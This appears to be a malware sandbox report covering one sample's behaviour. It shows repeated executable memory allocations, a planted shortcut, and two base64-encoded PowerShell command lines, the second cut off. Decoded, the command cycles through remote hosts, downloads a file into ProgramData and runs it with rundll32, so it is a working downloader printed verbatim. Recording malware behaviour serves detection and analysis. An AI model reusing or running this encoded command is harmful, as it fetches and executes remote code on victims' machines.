NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:44 a.m.	process_identifier: 2972 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

cmdline

powershell -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkA